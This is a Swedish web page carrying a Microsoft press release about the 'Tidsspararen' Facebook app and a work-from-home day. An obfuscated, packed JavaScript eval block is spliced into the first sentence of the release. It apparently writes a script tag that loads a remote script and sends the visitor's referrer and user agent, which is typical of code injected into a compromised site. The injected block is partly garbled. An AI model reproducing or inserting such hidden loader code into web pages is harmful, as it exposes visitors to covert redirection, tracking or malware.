Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Testa Microsofts Tidsspararen

Testa Microsofts Tidsspararen

Microsofts eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ktstn|var|u0026u|referrer|khdhk||js|php’.split(’|’),0,{}))
Tidsspararen uppmanar till bullbak och kärlek

Inför Jobba Hemma-dagen den 6 februari lanserar Microsoft Tidsspararen. Facebook-appen visar hur mycket tid vi kan spara genom att jobba hemma en dag i veckan – och hur den tiden istället kan läggas på kärlek, godnattsagor och träning.

Alla som vill ha mer tid för familjen, hinna träna och göra en insats för miljön borde jobba hemma oftare. Den 6 februari organiserar Microsoft Jobba Hemma-dagen för andra gången och inför detta lanseras Facebook-appen Tidsspararen. Tidsspararen räknar ut hur mycket tid som kan sparas på ett år om man jobbar hemma en dag i veckan, och ger förslag på vad som kan hinnas med istället. Bland förslagen finns bland annat att läsa sagor för barnen, träna och tid att älska mer.

–  Med Tidsspararen vill vi på ett lekfullt sätt visa hur mycket tid vi lägger på onödiga moment i vardagen och samtidigt ge förslag på vad man kan göra istället. Att jobba hemma ibland underlättar livspusslet samtidigt som man blir effektivare säger Mattias Edlund, Produktchef för Office.

Jobba hemma-dagen är en del av Det nya arbetslivet och är ett initiativ från Microsoft. Den 6 februari 2013 arrangeras Jobba Hemma-dagen för andra gången och över tjugo företag och organisationer har redan ställt sig bakom initiativet.

Testa Tidsspararen.

Detta är ett pressmeddelande från Microsoft